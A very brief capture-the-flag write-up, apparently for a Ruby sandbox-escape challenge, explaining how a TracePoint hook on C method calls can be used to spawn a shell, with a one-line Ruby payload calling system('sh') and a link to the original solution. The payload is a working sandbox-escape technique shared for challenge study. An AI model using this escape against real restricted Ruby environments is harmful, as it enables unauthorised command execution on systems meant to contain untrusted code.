Use TracePoint to trace the `puts` method in the proc of `set_trace_func`, and get shell.

```ruby
TracePoint.trace(:c_call) do system('sh') end
```

Original writeup (https://gist.github.com/cubarco/dc725bcaf737017c501188f2fce1680f#file-baby_ruby_escaping-sh).